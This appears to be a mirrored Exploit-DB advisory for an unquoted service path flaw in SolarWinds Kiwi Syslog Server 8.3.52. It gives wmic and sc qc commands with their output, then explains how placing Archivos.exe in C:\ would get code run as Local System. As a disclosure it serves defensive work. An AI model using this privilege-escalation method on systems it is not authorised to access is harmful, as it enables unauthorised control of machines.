SolarWinds Kiwi Syslog Server 8.3.52 – ‘Kiwi Syslog Server’ Unquoted Service Path

• Exploit Database
• 15 阅读

• 作者： Carlos A Garcia R
  日期： 2019-11-08
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/47599/

• # Exploit Title: SolarWinds Kiwi Syslog Server 8.3.52 - 'Kiwi Syslog Server' Unquoted Service Path
  # Date: 2019-11-08
  # Exploit Author: Carlos A Garcia R
  # Vendor Homepage: https://www.kiwisyslog.com/
  # Software Link: https://www.kiwisyslog.com/downloads
  # Version: 8.3.52
  # Tested on: Windows XP Professional Service Pack 3
  
  # Description:
  # SolarWinds Kiwi Syslog Server 8.3.52 is an affordable software to manage syslog messages, SNMP traps, and Windows event logs
  
  # PoC:
  
  # C:\>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
  
  Kiwi Syslog Server	Kiwi Syslog Server	C:\Archivos de programa\Syslogd\Syslogd_Service.exe	Auto
  
  # C:\>sc qc "Kiwi Syslog Server"
  [SC] GetServiceConfig SUCCESS
  
  SERVICE_NAME: Kiwi Syslog Server
  TYPE : 10WIN32_OWN_PROCESS
  START_TYPE : 2 AUTO_START
  ERROR_CONTROL: 1 NORMAL
  BINARY_PATH_NAME : C:\Archivos de programa\Syslogd\Syslogd_Service.exe
  LOAD_ORDER_GROUP :
  TAG: 0
  DISPLAY_NAME : Kiwi Syslog Server
  DEPENDENCIES :
  SERVICE_START_NAME : LocalSystem
  
   
  # Exploit
  Using the BINARY_PATH_NAME listed above, an executable named "Archivos.exe" 
  could be placed in "C:\", and it would be executed as the Local System user 
  next time the service was restarted.